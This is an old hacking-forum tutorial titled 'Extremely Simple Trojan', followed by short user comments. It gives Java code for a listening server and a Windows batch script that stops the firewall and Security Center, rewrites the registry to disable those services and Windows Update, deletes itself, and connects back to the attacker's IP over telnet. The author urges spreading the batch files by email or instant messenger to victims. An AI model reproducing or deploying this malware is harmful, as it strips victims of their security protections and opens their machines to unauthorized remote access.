Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Extremely Simple Trojan


Extremely Simple Trojan

By ghostghost | 7616 Reads |
0     0

This is written for java, but it will work in VB, C++, whatever your prefered language is, I just happen to know the net commands for java best.

Here is the source from my java app: import java.net.*; public class trojServer { public static void main(String args[]) { try{ ServerSocket server = new ServerSocket(5151); System.out.println("Waiting…"); Socket sock = server.accept(); System.out.println(sock); }catch(Exception x){x.printStackTrace();} } }

Now I'll explain a bit.

Bascially all I've done is set a port 5151 to wait for anything to connect to it, then it will resolve the IP address for you.

the batch file should look like

net stop "Security Center" net stop SharedAccess > "%Temp%.kill.reg" ECHO REGEDIT4 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsvc] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. START /WAIT REGEDIT /S "%Temp%.kill.reg" del "%Temp%.kill.reg" del %0 telnet 127.0.0.1 5151

Now, the 127.0.0.1 will obviously be replaced with your IP address (try running IPCONFIG) and the port, here 5151, with whatever you specifiy. The rest of the code knocks out the firewall and hides from the AV…not really too discreate, but effective.

Start running your serverTroj app and then send the batches out over aim or emails or however you prefer to distrbute them and wait. telnet in once you have the IP address and their secuity is down,

Enjoy… Thanks to Zone Vortex for the firewall/AV killer.

Comments
ghost's avatar
ghost 18 years ago

were you the one who wrote this on HTS?

ghost's avatar
ghost 18 years ago

I was. :) notice the same tag? lol have a nice day.

ghost's avatar
ghost 18 years ago

Thats Awesome!

ghost's avatar
ghost 18 years ago

heh. Thanks Kayos. You can mix this with the IExploit i wrote to make a hyprid trodjan

ellipsis's avatar
ellipsis 13 years ago

This doesn't handle multiple socket connections. This did help me with my java course in '07-'08. Since I have good memories in that year, I will rate as "Awesome!"